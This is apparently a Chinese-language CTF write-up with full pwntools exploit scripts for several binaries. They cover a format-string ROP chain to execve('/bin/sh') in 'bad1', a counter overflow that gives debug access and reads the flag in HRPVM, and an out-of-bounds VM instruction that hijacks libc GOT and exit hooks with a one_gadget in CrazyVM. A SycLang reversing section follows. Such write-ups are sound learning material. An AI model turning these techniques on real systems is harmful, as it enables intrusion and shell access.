109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
# -*- coding:utf-8 -*-
from time import sleep
from pwn import *

arch = 64
challenge = './bad1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc.so.6')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

cmd = "set debug-file-directory ./.debug/\nb *$rebase(0x1254)\n"

def debug():
#gdb.attach(p)
gdb.attach(p," b *$rebase(0x1226)\n")
pause()

def cmd(op):
sla(">",str(op))

def exp():
#debug()
def pwn(target):
global magic_stack2
if(target < 0x10000):
payload = "%{}c%8$hn\n%{}c%10$hn\n".format(magic_stack1,magic_gadget-1-magic_stack1).ljust(0x60,"\x00")
sla("try it: ",payload)
magic_stack2 = magic_stack2 + 8

for i in range(3):
magic_gadget = (target >> 16*i)%0x10000
success("magic_gadget >> "+hex(magic_gadget))
if(magic_stack1 > magic_gadget):
payload = "%{}c%10$hn\n%{}c%8$hn\n".format(magic_gadget,magic_stack1-1-magic_gadget).ljust(0x60,"\x00")
sla("try it: ",payload)
else:
payload = "%{}c%8$hn\n%{}c%10$hn\n".format(magic_stack1,magic_gadget-1-magic_stack1).ljust(0x60,"\x00")
sla("try it: ",payload)

y = i+1
if(i == 2):
magic_stack2 = magic_stack2 + 8
y = 0

if(magic_stack2 > magic_main):
payload = "%{}c%10$hn\n%{}c%8$hn\n".format(magic_main,magic_stack2-1+2*y-magic_main).ljust(0x60,"\x00")
sla("try it: ",payload)
else:
payload = "{}c%8$hn\n%{}c%10$hn\n%".format(magic_stack2,magic_main-1+2*y-magic_stack2).ljust(0x60,"\x00")
sla("try it: ",payload)

magic = 0xdc08-0x38
payload = "%3$p\n%1$p\n%9$p\n%6$p\n"
payload += "%{}c%8$hn\n".format(magic)
sla("try it: ",payload)

leak_addr = eval(p.recvuntil("\n")[:-1])
libc_base = leak_addr - 0x114992
leak_addr = eval(p.recvuntil("\n")[:-1])
heap_base = leak_addr - 0x2a0
leak_addr = eval(p.recvuntil("\n")[:-1])
pro_base = leak_addr - 0x1248
leak_addr = eval(p.recvuntil("\n")[:-1])
stack_addr = leak_addr - 0x148
success("libc_base >> "+hex(libc_base))
success("heap_base >> "+hex(heap_base))
success("pro_base >> "+hex(pro_base))
success("stack_addr >> "+hex(stack_addr))

io_list_all = libc_base + libc.sym["_IO_list_all"]
one_gadget = libc_base + 0x50a37
system = libc_base + libc.sym["system"]
binsh_addr = libc_base + 0x1d8698
pop_rax_ret = libc_base + 0x0000000000045eb0
pop_rdi_ret = libc_base + 0x000000000002a3e5
pop_rsi_ret = libc_base + 0x000000000002be51
pop_rcx_ret = libc_base + 0x000000000008c6bb
pop_rbx_ret = libc_base + 0x0000000000035dd1
pop_rdx_r12_ret = libc_base + 0x000000000011f497
syscall_ret = libc_base + 0x0000000000091396
mov_rdi_rbx_call_rcx = libc_base + 0x000000000015e9d8
add_rax_1_ret = libc_base + 0x00000000000d83b0
mov_rax_n1_ret = libc_base + 0x000000000004244e
mov_rdx_256_ret =libc_base + 0x00000000000ecfe7

success("io_list_all >> "+hex(io_list_all))
success("system >> "+hex(system))
success("binsh_addr >> "+hex(binsh_addr))
success("pop_rdi_ret >> "+hex(pop_rdi_ret))
success("one_gadget >> "+hex(one_gadget))

magic_stack1 = (stack_addr + 0x18)%0x10000
magic_stack2 = (stack_addr + 0x38)%0x10000
magic_main = (pro_base + 0x123B)%0x10000
magic_one1 = (one_gadget)%0x10000
magic_one2 = (one_gadget >> 16)%0x10000

payload = "%{}c%10$hn\n%{}c%8$hn\n".format(magic_main,magic_stack2-1-magic_main).ljust(0x60,"\x00")
sla("try it: ",payload)

pwn(pop_rsi_ret)
pwn(stack_addr+0x80)
pwn(mov_rdx_256_ret)
pwn(mov_rax_n1_ret)
pwn(add_rax_1_ret)
pwn(pop_rcx_ret)
pwn(binsh_addr)
pwn(pop_rcx_ret)
pwn(syscall_ret)
pwn(mov_rdi_rbx_call_rcx)

sla("try it: ","1"*0x20)
sla("try it: ","2"*0x20)

payload = p64(pop_rax_ret)+p64(59)+p64(pop_rdi_ret)+p64(binsh_addr)+p64(pop_rsi_ret)+p64(0)+p64(pop_rdx_r12_ret)+p64(0)+p64(0)+p64(syscall_ret)
sla("22222222222222222222222222222222",payload)

p.interactive()

while(1):
try:
local = 1
if local:
p = process(challenge)
#p = gdb.debug(challenge, cmd)
else:
p = remote('119.13.105.35','10111')
exp()
sla("cat flag")
flag = p.recvline()
success("flag >> "+flag)
break
except:
p.close()

vmbyhrp

1
2
3
4
5
6
HRPVM: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=ae19ec35e351cd7e0113b04270566c04bd3bd321, not stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开

漏洞分析

在 DEBUG 命令中有读取任意文件的功能:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
puts("FILE NAME:");
name = malloc(0x20uLL);
read(0, name, 0x20uLL);
deleEnter((const char *)name);
stream = fopen((const char *)name, "ab+");
if ( stream )
{
for ( i = 0; (unsigned int)__isoc99_fscanf(stream, "%c", &data[i]) != -1; ++i )
;
fclose(stream);
HF[file_count].fd = global_fd;
HF[file_count].name = (char *)name;
HF[file_count].size = 1000LL;
count = file_count;
HF[count].data = (__int64)malloc(0x1000uLL);
strncpy((char *)HF[file_count].data, data, 0x1000uLL);
++file_count;
++global_fd;
}
  • DEBUG 命令需要覆盖 gid 和 uid
1
2
if ( !strncmp(system_cmd[6], (const char *)buf, len) && !gid && !uid )// debug
DEBUG();

全局变量 file_count 没有限制大小,导致 HF 可以向下溢出到 gid 和 uid

1
2
3
4
5
6
7
8
9
HF[file_count].fd = global_fd;
HF[file_count].name = name;
HF[file_count].size = 1000LL;
count = file_count;
HF[count].data = (__int64)malloc(0x1000uLL);
printf("FILE CONTENT: ");
read(0, (void *)HF[file_count].data, 0x1000uLL);
deleEnter((const char *)HF[file_count].data);
++file_count;

入侵思路

使用如下两个脚本并配合溢出可以很轻松地覆盖 gid 和 uid:

1
2
3
4
5
6
7
8
9
10
payload =  "mov rdi,1;"
payload += "mov rsi,36;"
payload += "mov rdx,1001;"
payload += "mov rax,1;"
payload += "call write,1;"

payload2 = "mov rdi,35;"
payload2 += "mov rsi,0;"
payload2 += "mov rax,2;"
payload2 += "call open,2;"

但 DEBUG 退出时会置空全局变量 dest 导致后续程序触发段错误:

1
2
3
4
5
deleEnter(buf);
gid = 1000;
uid = 1000;
strncpy(dest, src, 8uLL);
machine_start();

login_system 函数中可以往全局变量 dest 中写入数据:

1
2
printf("%s", "[+]HOLDER:");
read(0, dest, 0x10uLL);

在 mmap 命令中可以使用 mmap 创建一片合法的空间:

1
2
3
4
5
6
7
if ( !strncmp(debug_cmd[4], buf, len) )     // mmap
{
addr = 0LL;
puts("[+]ADDR EXPEND:");
__isoc99_scanf("%lld", &addr);
mmap(addr, 0x400uLL, 3, 34, -1, 0LL);
}

于是我们可以在 DEBUG 使用 mmap 指令创建合法空间,然后 reboot 调用 login_system 并写入合法空间,这样就不会发生段错误了

剩下的操作就是程序的正常功能,完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './HRPVM'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
#libc = ELF('libc-2.31.so')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

local = 1
if local:
p = process(challenge)
else:
p = remote('119.13.105.35','10111')

def debug():
#gdb.attach(p)
gdb.attach(p,"b *$rebase(0x248E)\nb *$rebase(0x220B)\n")
#pause()

def cmd(op):
sla(">",str(op))

def pwn(name):
sla("HRP-MACHINE$ ","./"+name)

def add(name,data):
sla("HRP-MACHINE$ ","file")
sla("FILE NAME: ",name)
sla("FILE CONTENT: ",data)

def dele(name):
sla("HRP-MACHINE$ ","rm "+name)

#debug()

sla("USER NAME:","HRPHRP")
sla("PASSWORD:","PWNME")
sla("[+]HOLDER:","YHELLOW")

payload = "mov rdi,1;"
payload += "mov rsi,36;"
payload += "mov rdx,1001;"
payload += "mov rax,1;"
payload += "call write,1;"

payload2 = "mov rdi,35;"
payload2 += "mov rsi,0;"
payload2 += "mov rax,2;"
payload2 += "call open,2;"

payload3 = "mov rdi,36;"
payload3 += "mov rsi,1001;"
payload3 += "mov rax,2;"
payload3 += "call open,2;"

add("write",payload)
add("open",payload2)
add("open2",payload3)

for i in range(29):
add(str(i),"1111")

pwn("open")

sla("HRP-MACHINE$ ","DEBUG")
sla("[+][DEBUGING]root#","file input")
sla("FILE NAME:","flag")
sla("[+][DEBUGING]root#","mmap")
sla("[+]ADDR EXPEND:",str(0x560000000000))
sla("[+][DEBUGING]root#","exit")

sla("HRP-MACHINE$ ","reboot")
sla("USER NAME:","HRPHRP")
sla("PASSWORD:","PWNME")
sla("[+]HOLDER:",p64(0x560000000000))

pwn("open2")
pwn("write")

p.interactive()

CrazyVM

1
GNU C Library (Ubuntu GLIBC 2.31-0ubuntu9.2) stable release version 2.31
1
2
3
4
5
6
CrazyVM: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=db8e268984b1b742f3813cdb5662ef47af09628d, for GNU/Linux 3.2.0, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开

程序分析

首先程序没法控制 malloc free 应该不是打堆,Full RELRO 打不了 GOT 表,另外程序也没有一些特殊字符串和类似于 strcmp 之类的函数

上述这些特点说明:本程序需要逆向虚拟机指令格式,猜测应该是自定义了一个虚拟机指令格式,我们需要逆向该指令格式并找到漏洞(漏洞点极有可能是溢出)

  • 虚拟机有两种实现方式:
    • 一种是将虚拟机字节码翻译为 ELF 指令,然后交给 CPU 运行(这种通常要打 shellcode)
    • 一种是在虚拟机内部实现各个指令的函数,通过这些函数模拟指令执行的过程(这种通常要注意溢出漏洞)

随便输入点数据试试程序结构:

1
2
3
4
code = "1111"
data = "2222"
sla("input code for vm: ",code)
sla("input data for vm: ",data)

在 GDB 中调试分析:

1
2
3
4
5
0x55d73e8fe290      0x0                 0x170		/* info */
0x55d73e8fe400 0x0 0x20 /* node */
0x55d73e8fe420 0x55d73e8fe430 0x10010 /* data */
0x55d73e90e430 0x0 0x20 /* node */
0x55d73e90e450 0x7fa93f84f010 0x20 /* node */
  • 整体堆布局:核心控制信息 info,3个次要信息 node,1个缓冲区
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
pwndbg> telescope 0x55d73e8fe2a0 /* INFO */
00:0000│ rax rdi 0x55d73e8fe2a0 ◂— 0x0
... ↓ 7 skipped
08:00400x55d73e8fe2e0 ◂— 0x0
... ↓ 7 skipped
10:00800x55d73e8fe320 ◂— 0x7f00000000080000
11:00880x55d73e8fe328 ◂— 0x7f00000000080000
12:00900x55d73e8fe330 ◂— 0x0
13:00980x55d73e8fe338 ◂— 0x0
14:00a0│ 0x55d73e8fe340 —▸ 0x55d73e8fe410 ◂— 0x0 /* NODE-code */
15:00a8│ 0x55d73e8fe348 —▸ 0x55d73e90e440 ◂— 0x7f00000000000000 /* NODE-fini */
16:00b0│ 0x55d73e8fe350 —▸ 0x55d73e90e460 ◂— 0x5000000000000000 /* NODE-data */
17:00b8│ 0x55d73e8fe358 ◂— 0x0
18:00c0│ 0x55d73e8fe360 ◂— 0x0
... ↓ 7 skipped
20:01000x55d73e8fe3a0 ◂— 0x0
... ↓ 7 skipped
28:01400x55d73e8fe3e0 ◂— 0x0
... ↓ 4 skipped
  • Chunk + 21*8 的位置有3个 chunk 指针
  • 分析出第1个 chunk 用于管理 code,第3个 chunk 用于管理 data
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
pwndbg> telescope 0x55d73e8fe400 /* NODE-code */
00:00000x55d73e8fe400 ◂— 0x0
01:00080x55d73e8fe408 ◂— 0x21 /* '!' */
02:00100x55d73e8fe410 ◂— 0x0
03:00180x55d73e8fe418 ◂— 0x10000
04:00200x55d73e8fe420 —▸ 0x55d73e8fe430 ◂— 0xa31313131 /* '1111\n' */
pwndbg> telescope 0x55d73e90e430 /* NODE-fini */
00:00000x55d73e90e430 ◂— 0x0
01:00080x55d73e90e438 ◂— 0x21 /* '!' */
02:00100x55d73e90e440 ◂— 0x7f00000000000000
03:00180x55d73e90e448 ◂— 0x100000
04:00200x55d73e90e450 —▸ 0x7fa93f84f010 ◂— 0x0
pwndbg> telescope 0x55d73e90e450 /* NODE-data */
00:00000x55d73e90e450 —▸ 0x7fa93f84f010 ◂— 0x0
01:00080x55d73e90e458 ◂— 0x21 /* '!' */
02:00100x55d73e90e460 ◂— 0x5000000000000000
03:00180x55d73e90e468 ◂— 0x20000
04:00200x55d73e90e470 —▸ 0x7fa93f82e010 ◂— 0xa32323232 /* '2222\n' */
  • 目前不知道第2个 chunk 的信息
  • PS:由于 size 过大,导致 calloc 调用了 mmap

通过调试分析可以初步提取出如下两个结构体:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
00000000 Info struc ; (sizeof=0x180, mappedto_8)
00000000 buf dq 16 dup(?)
00000080 temp_base dq ?
00000088 data_base dq ?
00000090 code_base dq ?
00000098 field_98 dq ?
000000A0 node_code dq ? ; offset
000000A8 node_temp dq ? ; offset
000000B0 node_data dq ? ; offset
000000B8 field_B8 dq ?
000000C0 field_C0 dq ?
000000C8 field_C8 dq ?
000000D0 field_D0 dq ?
000000D8 field_D8 dq ?
000000E0 field_E0 dq ?
000000E8 field_E8 dq ?
000000F0 field_F0 dq ?
000000F8 field_F8 dq ?
00000100 field_100 dq ?
00000108 field_108 dq ?
00000110 field_110 dq ?
00000118 field_118 dq ?
00000120 key db ?
00000121 db ? ; undefined
00000122 db ? ; undefined
00000123 db ? ; undefined
00000124 db ? ; undefined
00000125 db ? ; undefined
00000126 db ? ; undefined
00000127 db ? ; undefined
00000128 code dq ?
00000130 key2 db ?
00000131 db ? ; undefined
00000132 db ? ; undefined
00000133 db ? ; undefined
00000134 db ? ; undefined
00000135 db ? ; undefined
00000136 db ? ; undefined
00000137 db ? ; undefined
00000138 t_rsi dq ?
00000140 t_rdx dq ?
00000148 t_rcx dq ?
00000150 t_r8 dq ?
00000158 func dq ? ; offset
00000160 key3 db ?
00000161 db ? ; undefined
00000162 db ? ; undefined
00000163 db ? ; undefined
00000164 db ? ; undefined
00000165 db ? ; undefined
00000166 db ? ; undefined
00000167 db ? ; undefined
00000168 field_168 dq ?
00000170 field_170 dq ?
00000178 field_178 dq ?
00000180 Info ends
1
2
3
4
5
00000000 Node struc ; (sizeof=0x18, mappedto_9)
00000000 base dq ?
00000008 size dq ?
00000010 chunk dq ? ; offset
00000018 Node ends

在函数 hand_key 中有非常复杂的 Switch-case 结构,猜测程序在这里完成指令执行的工作:

1
2
3
4
5
6
7
8
9
10
11
case 1u:
if ( !op1 || op1 == 2 || op1 == 3 )
{
ptr->key2 = 1;
ptr->func = sub_176C;
ptr->r_rdi = op1;
ptr->r_rsi = op2;
ptr->r_rdx = BYTE3(ptr->code);
ptr->r_rcx = (unsigned __int8)BYTE4(ptr->code);
re = 0;
}
  • 对于每一个 case,程序都设计了一个函数来完成其功能
  • 这里只能断点调试,通过输入值和返回值来判断该函数的功能

漏洞分析

1
2
3
4
5
6
.text:000000000000D77D 48 8B 45 E8                   mov     rax, [rbp+var_18]
.text:000000000000D781 48 8B B0 38 01 00 00 mov rsi, [rax+138h]
.text:000000000000D788 48 8B 45 E8 mov rax, [rbp+var_18]
.text:000000000000D78C 49 89 F8 mov r8, rdi
.text:000000000000D78F 48 89 C7 mov rdi, rax
.text:000000000000D792 41 FF D1 call r9
  • 程序会运行一个函数指针

该程序的漏洞极有可能是堆溢出(覆盖函数指针),但程序对 op3-offset 进行了限制:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
switch ( op1 )
{
case 0u:
if ( BYTE3(ptr->code) <= 0x11uLL )
goto true;
result = 0xFFFFFFFFLL;
break;
case 1u:
if ( BYTE3(ptr->code) <= 0x11uLL )
goto true;
result = 0xFFFFFFFFLL;
break;
case 2u:
if ( BYTE3(ptr->code) <= 0x11uLL )
goto true;
result = 0xFFFFFFFFLL;
break;
case 3u:
if ( BYTE3(ptr->code) <= 0x11uLL )
goto true;
result = 0xFFFFFFFFLL;
break;
case 4u:
if ( BYTE3(ptr->code) <= 0x11uLL )
goto true;
result = 0xFFFFFFFFLL;
break;
case 5u:
  • 想要绕过这个限制就必须让 op1 为“5”,导致多数指令没法正常执行

在程序的第 0x12 和 0x13 号指令中还有另一处漏洞:

1
2
3
4
5
ptr->temp_base -= 8LL;
if ( offset <= 0xF )
*(_QWORD *)&ptr->node_temp->chunk[ptr->temp_base - ptr->node_temp->base] = ptr->buf[offset];// 0x80000-8
else
*(_QWORD *)&ptr->node_temp->chunk[ptr->temp_base - ptr->node_temp->base] = ptr->temp_base;
  • 指令 0x12 可以将任意数据存储到 ptr->node_temp->chunk 指向的堆空间中
1
2
3
4
5
ptr->temp_base += 8LL;
if ( offset <= 0xF )
ptr->buf[offset] = *(_QWORD *)&ptr->node_temp->chunk[ptr->temp_base - ptr->node_temp->base - 8];// 0x80000-8
else
ptr->temp_base = *(_QWORD *)&ptr->node_temp->chunk[ptr->temp_base - ptr->node_temp->base - 8];
  • 指令 0x13 可以将 ptr->node_temp->chunk 中的数据取出,并且可以控制 ptr->temp_base

关键点就在于 ptr->temp_base 是可控的,并且程序没有对 ptr->temp_base 的范围进行检查,这就导致了 mmap 的堆空间发生溢出

入侵思路

由于 mmap 的堆空间发生溢出,我们就有机会劫持 free_hook

利用下面的脚本可以将 libc-calloc 提取出来,并且导致 ptr->node_temp->chunk[ptr->temp_base - ptr->node_temp->base - 8] 索引到 libc-GOT:

1
2
3
4
5
6
7
code =  intemp(0x10) 
code += outtemp(0)
code += mov(1,0x323020+8-0x80000)
code += add(0,1)
code += intemp(0)
code += outtemp(0x10)
code += outtemp(2)
1
2
3
4
5
pwndbg> telescope 0x559f7a2bb2a0
00:0000│ rdi 0x559f7a2bb2a0 ◂— 0x7f00000000323020 /* ' 02' */
01:00080x559f7a2bb2a8 ◂— 0x2a3028 /* '(0*' */
02:00100x559f7a2bb2b0 —▸ 0x7f7d06f06c90 (calloc) ◂— endbr64
03:00180x559f7a2bb2b8 ◂— 0x0

再加上下面脚本就可以成功劫持 libc-GOT(calloc):

1
2
3
code += mov(1,0xe6aee-0x9ec90)
code += add(2,1)
code += intemp(2)
  • 劫持前:
1
2
3
4
5
6
7
07:00380x7f068029e018 (_dl_catch_exception@got.plt) —▸ 0x7f06801df6a0 (_dl_catch_exception) ◂— endbr64 
08:00400x7f068029e020 (malloc@got.plt) —▸ 0x7f0680119260 (malloc) ◂— endbr64
09:00480x7f068029e028 (_dl_signal_exception@got.plt) —▸ 0x7f06801df5f0 (_dl_signal_exception) ◂— endbr64
0a:00500x7f068029e030 (calloc@got.plt) —▸ 0x7f068011ac90 (calloc) ◂— endbr64
0b:00580x7f068029e038 (realloc@got.plt) —▸ 0x7f068011a000 (realloc) ◂— endbr64
0c:00600x7f068029e040 (_dl_signal_error@got.plt) —▸ 0x7f06801df640 (_dl_signal_error) ◂— endbr64
0d:00680x7f068029e048 (_dl_catch_error@got.plt) —▸ 0x7f06801df7c0 (_dl_catch_error) ◂— endbr64
  • 劫持后:
1
0c:0060│ rcx 0x7f068029e030 (calloc@got.plt) —▸ 0x7f0680162aee (execvpe+638) ◂— mov    rdx, r12

不过 calloc-GOT 显然无法触发,因此我们需要重新计算一下偏移去劫持 exit_hook

1
2
3
pwndbg> telescope 0x7f0afda13010+0x323020
00:00000x7f0afdd36030 (calloc@got.plt) —▸ 0x7f0afdbb2c90 (calloc) ◂— endbr64
01:00080x7f0afdd36038 (realloc@got.plt) —▸ 0x7f0afdbb2000 (realloc) ◂— endbr64
1
2
3
4
5
6
7
pwndbg> p rtld_lock_default_lock_recursive
$3 = {void (void *)} 0x7fa350ad8150 <rtld_lock_default_lock_recursive>
pwndbg> search -t qword 0x7fa350ad8150
Searching for value: b'P\x81\xadP\xa3\x7f\x00\x00'
ld-2.31.so 0x7fa350b05f68 0x7fa350ad8150
pwndbg> distance 0x7fa3507e2010 0x7fa350b05f68
0x7fa3507e2010->0x7fa350b05f68 is 0x323f58 bytes (0x647eb words)

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './CrazyVM1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.31.so')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

local = 1
if local:
p = process(challenge)
else:
p = remote('119.13.105.35','10111')

def debug():
#gdb.attach(p)
gdb.attach(p,"b *$rebase(0xB58C)\n") #0xD792
pause()

def cmd(op):
sla(">",str(op))

def op(op,rsi,rdx,rcx,r8):
return p8(op)+p8(rsi)+p8(rdx)+p8(rcx)+p32(r8)

def mov(offset,data):
return op(1,1,2,offset,data)

def intemp(offset):
return op(0x12,4,3,offset,0)

def outtemp(offset):
return op(0x13,4,3,offset,0)

def add(offset,data):
return op(2,0,3,offset,data)

#debug()

code = intemp(0x10)
code += outtemp(0)
code += mov(1,0x323020+8-0x80000)
code += add(1,0)
code += intemp(1)
code += outtemp(0x10)
code += outtemp(3)

code += mov(1,0xe6aee-0x9ec90)
code += add(3,1)

code += mov(1,0x323f58+0x10-0x80000)
code += add(1,0)
code += intemp(1)
code += outtemp(0x10)
code += intemp(3)

data = "1"

sa("input code for vm: ",code)
sa("input data for vm: ",data)

"""
0xe6aee execve("/bin/sh", r15, r12)
constraints:
[r15] == NULL || r15 == NULL
[r12] == NULL || r12 == NULL

0xe6af1 execve("/bin/sh", r15, rdx)
constraints:
[r15] == NULL || r15 == NULL
[rdx] == NULL || rdx == NULL

0xe6af4 execve("/bin/sh", rsi, rdx)
constraints:
[rsi] == NULL || rsi == NULL
[rdx] == NULL || rdx == NULL
"""

p.interactive()

SycLang 出题思路

本题目提供了中间代码和编译器前端,要求将中间代码逆向回C,自行编译后解出 flag(当然也可以直接通过中间代码分析 flag)

首先,本程序有3个陷阱:

1
2
3
4
5
6
7
8
9
10
11
12
13
#!tempa := {#8}*{var16<+64>}
var12<+32> := var22(@exp.key[0])<+8><+488><+tempa>
temp84 := #1
temp85 := var15<+56> + temp84
var18<+80> := temp85
#!tempa := {#8}*{var18<+80>}
var13<+40> := var22(@exp.key[0])<+8><+488><+tempa>
temp86 := #0
var13<+40> := temp86
temp87 := var12<+32> ^ var13<+40>
var14<+48> := temp87
#!tempa := {#8}*{var16<+64>}
var22(@exp.key[0])<+8><+488><+tempa> := var14<+48>
  • var13<+40> 在异或前会赋值“0”,因此对 e1.key(var22(@exp.key[0])<+8><+488><+tempa>) 的异或加密失效
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
LABEL label59 :
temp89 := #0
var24(@exp.L[0])<+200><+1256> := temp89
temp91 := #12
var24(@exp.R[0])<+264><+1256> := temp91
temp93 := #0

......

var24(@exp.key[23])<+192><+1256> := temp195
temp196 := #23
var15<+56> := temp196
LABEL label118 :
temp198 := #0
IF var15<+56> > temp198 GOTO label117
GOTO label116
LABEL label117 :
var18<+80> := var15<+56>
#!tempa := {#8}*{var18<+80>}
var19<+88> := var24(@exp.key[0])<+8><+1256><+tempa>
temp199 := #1
temp200 := var15<+56> - temp199
var16<+64> := temp200
#!tempa := {#8}*{var16<+64>}
var17<+72> := var24(@exp.key[0])<+8><+1256><+tempa>
temp201 := var19<+88> - var17<+72>
var21<+104> := temp201
#!tempa := {#8}*{var15<+56>}
var24(@exp.key[0])<+8><+1256><+tempa> := var21<+104>
temp197 := #1
var15<+56> := var15<+56> - temp197
GOTO label118
LABEL label116 :
temp202 := #0
var15<+56> := temp202
LABEL label126 :
temp204 := #8
IF var15<+56> < temp204 GOTO label125
GOTO label124
LABEL label125 :
#!tempa := {#8}*{var15<+56>}
var16<+64> := var24(@exp.L[0])<+200><+1256><+tempa>
#!tempa := {#8}*{var15<+56>}
var18<+80> := var24(@exp.R[0])<+264><+1256><+tempa>
#!tempa := {#8}*{var15<+56>}
var20<+96> := var24(@exp.X[0])<+328><+1256><+tempa>
#!tempa := {#8}*{var16<+64>}
var17<+72> := var24(@exp.key[0])<+8><+1256><+tempa>
#!tempa := {#8}*{var18<+80>}
var19<+88> := var24(@exp.key[0])<+8><+1256><+tempa>
var17<+72> := var17<+72> + var20<+96>
var19<+88> := var19<+88> - var20<+96>
#!tempa := {#8}*{var16<+64>}
var24(@exp.key[0])<+8><+1256><+tempa> := var17<+72>
#!tempa := {#8}*{var18<+80>}
var24(@exp.key[0])<+8><+1256><+tempa> := var19<+88>
temp203 := #1
var15<+56> := var15<+56> + temp203
GOTO label126
LABEL label124 :
temp207 := #1
var15<+56> := temp207
LABEL label137 :
temp209 := #24
IF var15<+56> < temp209 GOTO label136
GOTO label135
LABEL label136 :
#!tempa := {#8}*{var15<+56>}
var17<+72> := var24(@exp.key[0])<+8><+1256><+tempa>
temp210 := #1
temp211 := var15<+56> - temp210
var16<+64> := temp211
#!tempa := {#8}*{var16<+64>}
var20<+96> := var24(@exp.key[0])<+8><+1256><+tempa>
var17<+72> := var17<+72> + var20<+96>
#!tempa := {#8}*{var15<+56>}
var24(@exp.key[0])<+8><+1256><+tempa> := var17<+72>
temp208 := #1
var15<+56> := var15<+56> + temp208
GOTO label137
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
LABEL label168 :
temp263 := #24
IF var15<+56> < temp263 GOTO label167
GOTO label166
LABEL label167 :
var16<+64> := var15<+56>
#!tempa := {#8}*{var16<+64>}
var17<+72> := var23(@exp.key[0])<+8><+872><+tempa>
var18<+80> := var15<+56>
#!tempa := {#8}*{var18<+80>}
var19<+88> := var24(@exp.key[0])<+8><+1256><+tempa>
temp264 := var17<+72> ^ var19<+88>
var21<+104> := temp264
#!tempa := {#8}*{var15<+56>}
var23(@exp.key[0])<+8><+872><+tempa> := var21<+104>
temp262 := #1
var15<+56> := var15<+56> + temp262
GOTO label168
